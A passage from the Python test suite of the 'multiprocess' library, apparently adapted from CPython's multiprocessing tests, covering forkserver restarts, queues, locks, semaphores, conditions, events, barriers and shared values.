if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
            # Only the forkserver start method has a forkserver process
            # that we can kill and expect to be restarted implicitly.
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocess.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = os_helper.TESTFN
self.addCleanup(os_helper.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, encoding="utf-8") as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("__init__.py", err)
#self.assertIn("1/0 # MARKER", err) #FIXME
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', encoding="utf-8", closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', encoding="utf-8", closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = os_helper.TESTFN
self.addCleanup(os_helper.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, encoding="utf-8") as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shut down until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
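# Worker: consume items until the None sentinel arrives, sleeping briefly
# and marking each real item done with task_done().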
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with os_helper.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w', encoding="utf-8") as f:
f.write("""if 1:
import multiprocess as multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with import_helper.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
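# Helper whose pickling always fails, used to exercise the feeder
# thread's error handling.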
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platforms as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on macOS
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
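# Child: take the condition, signal `sleeping` just before waiting,
# then signal `woken` once the wait returns.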
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
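# Child: reset state to 0, notify the parent, then wait until the parent
# has driven state up to 4; exit nonzero on failure.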
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
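# Child: wait_for a condition the parent never satisfies and record
# success only if the wait times out within a reasonable window.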
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily due to API shear; this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed: threading.Event.wait() returns the value of __flag
# instead of None. API shear with the semaphore-backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class _DummyList
# for the same purpose.
class _DummyList(object):
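# A process-shared counter disguised as a list: append() bumps an int kept
# in a shared memory buffer and __len__() reads it back, both under a lock.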
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads or processes.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
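# Each party crosses the barrier twice per pass, appending to the shared
# result lists and asserting along the way that everyone stays in lockstep.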
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
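# Each worker crosses the barrier `passes` times, sending its current pass
# index to the parent over the pipe under the shared lock.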
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocess.sharedctypes")
@classmethod
def _test(cls, values):
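# Child: overwrite each shared value with the third entry of its
# codes_values triple, so the parent can verify the change.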
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
